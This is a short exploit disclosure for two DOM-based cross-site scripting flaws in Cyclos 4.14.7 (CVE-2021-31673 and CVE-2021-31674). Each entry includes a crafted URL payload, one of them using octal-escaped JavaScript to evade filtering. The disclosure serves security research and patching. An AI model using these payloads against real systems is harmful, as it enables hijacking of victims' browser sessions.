Cyclos 4.14.7 Cross Site Scripting

`# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)  
# Date: 17/04/2021  
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services  
# Vendor Homepage: https://www.cyclos.org/  
# Version: Cyclos 4.14.7 (and prior)  
# Tested on: Ubuntu  
# CVE : CVE-2021-31673  
  
# Description:   
A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.  
  
# Steps to reproduce:   
An attacker sends a draft URL  
  
[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.  
  
When a victim opens the URL, XSS will be triggered.  
  
  
  
-----  
  
  
# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)  
# Date: 18/04/2021  
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services  
# Vendor Homepage: https://www.cyclos.org/  
# Version: Cyclos 4.14.7 (and prior)  
# Tested on: Ubuntu  
# CVE : CVE-2021-31674  
  
# Description:   
Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.  
  
# Steps to reproduce:   
An attacker sends a draft URL  
  
[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.  
  
When a victim opens the URL, XSS will be triggered.  
  
`